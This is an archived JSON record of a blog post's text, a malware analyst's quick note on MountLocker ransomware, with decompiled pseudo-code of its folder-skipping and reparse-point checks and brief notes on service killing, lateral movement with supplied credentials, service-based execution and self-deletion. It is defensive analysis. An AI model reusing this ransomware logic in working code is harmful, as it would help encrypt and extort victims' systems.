{
	"id": "1fa04aa8-4021-4738-bd28-2967ce542d55",
	"created_at": "2026-04-06T00:17:55.140213Z",
	"updated_at": "2026-04-10T03:22:06.384578Z",
	"deleted_at": null,
	"sha1_hash": "5561e179984ddf988c71877362f83e7d26982494",
	"title": "[QuickNote] MountLocker – Some pseudo-code snippets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 113113,
	"plain_text": "[QuickNote] MountLocker – Some pseudo-code snippets\r\nPublished: 2021-08-04 · Archived: 2026-04-05 22:57:07 UTC\r\n+ Kill services, if service name contains any string is \"SQL\", \"database\", \"msexchange\" :\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n__int64 __fastcall f_ml_check_folder_in_ignored_list_and_log_info( __int64\r\n*stru_offset, ml_target_info *target_info)\r\n{\r\nREPARSE_DATA_BUFFER *reparse_point_data;\r\nconst WCHAR *ptr_ignored_folder_list;\r\nconst WCHAR *target_name;\r\n__int64 i;\r\nconst wchar_t *black_list_info;\r\nHANDLE hFile;\r\n__int64 win32_err_code;\r\nconst wchar_t *err_log_str;\r\nBOOL ret;\r\n__int64 v14;\r\nchar *v15;\r\nDWORD BytesReturned;\r\nreparse_point_data = (REPARSE_DATA_BUFFER *)\u0026target_info-\u003etarget_ransom_note_name;\r\n_InterlockedAdd(\u0026dword_140013350, 1u);\r\nptr_ignored_folder_list = g_ignored_folder_list;\r\ntarget_name = CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)-\r\n\u003etarget_name;\r\ni = 0i64;\r\nwhile ( ptr_ignored_folder_list )\r\nhttps://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/\r\nPage 1 of 5\n\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n{\r\nif ( StrStrIW(target_name, ptr_ignored_folder_list) )\r\n{\r\nblack_list_info = L\"[SKIP] locker.dir.check \u003e black_list name=%s\\r\\n\" ;\r\nLABEL_10:\r\n_InterlockedAdd(\u0026dword_140013354, 1u);\r\nlog_info:\r\nf_ml_write_format_string_to_log_file_or_console(1, black_list_info, target_name);\r\nreturn 0i64;\r\n}\r\nptr_ignored_folder_list = (\u0026g_ignored_folder_list)[++i];\r\n}\r\nif ( g_target || g_fullpd_flag )\r\n{\r\ntarget_info-\u003eencrypt_target_of_full_flag = 0;\r\n}\r\nelse if ( f_ml_check_folder_name_is_ProgramData_ProgramFiles_SQL(stru_offset,\r\ntarget_info) )\r\n{\r\nblack_list_info = L\"[SKIP] locker.dir.check \u003e no sql program dir name=%s\\r\\n\" ;\r\ngoto LABEL_10;\r\n}\r\nif ( !(CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)-\r\n\u003elpFindData.dwFileAttributes \u0026 FILE_ATTRIBUTE_REPARSE_POINT) )\r\n{\r\nf_ml_write_format_string_to_log_file_or_console(1, L\"[OK] locker.dir.check \u003e\r\nname=%s\\r\\n\" , target_name);\r\nhttps://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/\r\nPage 2 of 5\n\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\nreturn 1i64;\r\n}\r\nhFile = CreateFileW(target_name, 0x80u, 7u, 0i64, OPEN_EXISTING, 0x2200400u, 0i64);\r\nif ( hFile == ( HANDLE )INVALID_HANDLE_VALUE )\r\n{\r\nwin32_err_code = GetLastError();\r\nerr_log_str = L\"[WARN] locker.dir.check \u003e open error=%u name=%s\\r\\n\" ;\r\nlog_error:\r\nf_ml_write_format_string_to_log_file_or_console(1, err_log_str, win32_err_code,\r\ntarget_name);\r\nreturn 1i64;\r\n}\r\nret = DeviceIoControl(hFile, FSCTL_GET_REPARSE_POINT, 0i64, 0, reparse_point_data,\r\n0x4000u, \u0026BytesReturned, 0i64);\r\nCloseHandle(hFile);\r\nif ( !ret )\r\n{\r\nwin32_err_code = GetLastError();\r\nerr_log_str = L\"[WARN] locker.dir.check \u003e get_reparse_point error=%u\r\nname=%s\\r\\n\" ;\r\ngoto log_error;\r\n}\r\nif ( reparse_point_data-\u003eReparseTag == IO_REPARSE_TAG_MOUNT_POINT )\r\n{\r\nv14 = 0x10i64;\r\n}\r\nelse\r\nhttps://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/\r\nPage 3 of 5\n\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n98\r\n99\r\n{\r\nif ( reparse_point_data-\u003eReparseTag != IO_REPARSE_TAG_SYMLINK )\r\n{\r\nwin32_err_code = reparse_point_data-\u003eReparseTag;\r\nerr_log_str = L\"[WARN] locker.dir.check \u003e unknown_tag tag=%0.8X name=%s\\r\\n\" ;\r\ngoto log_error;\r\n}\r\nv14 = 0x14i64;\r\n}\r\nv15 = ( char *)reparse_point_data + v14;\r\nif ( *target_name == '\\\\'\r\n\u0026\u0026 CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)-\u003etarget_name[1] ==\r\n'\\\\'\r\n\u0026\u0026 CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)-\u003etarget_name[2] !=\r\n'?' )\r\n{\r\nblack_list_info = L\"[SKIP] locker.dir.check \u003e reparse_point_into_share\r\nname=%s\\r\\n\" ;\r\ngoto log_info;\r\n}\r\nif ( StrStrIW(( PCWSTR )(( char *)reparse_point_data + v14), L\":\\\\\" ) )\r\n{\r\n_InterlockedAdd(\u0026dword_140013354, 1u);\r\nf_ml_write_format_string_to_log_file_or_console(1, L\"[SKIP] locker.dir.check \u003e\r\ntarget_visibled target=%s name=%s\\r\\n\" , v15, target_name);\r\nreturn 0i64;\r\n}\r\nhttps://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/\r\nPage 4 of 5\n\n100\r\nf_ml_write_format_string_to_log_file_or_console(1, L\"[OK] locker.dir.check \u003e\r\ntarget_hidden target=%s name=%s\\r\\n\" , v15, target_name);\r\nreturn 1i64;\r\n}\r\n…. and skipped folder name is:\r\n+ Use WNetAddConnection2W to make a connection to remote target PC by using the provided username and\r\npassword arg:\r\n+ Execute payload through a service.\r\nAfter completing the encryption process on the victim machine, it updates log statistics:\r\nMalware checks the /NODEL argument. If this value is 0 , it will delete itself.\r\nSource: https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/\r\nhttps://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/"
	],
	"report_names": [
		"quicknote-mountlocker-some-pseudo-code-snippets"
	],
	"threat_actors": [],
	"ts_created_at": 1775434675,
	"ts_updated_at": 1775791326,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5561e179984ddf988c71877362f83e7d26982494.pdf",
		"text": "https://archive.orkl.eu/5561e179984ddf988c71877362f83e7d26982494.txt",
		"img": "https://archive.orkl.eu/5561e179984ddf988c71877362f83e7d26982494.jpg"
	}
}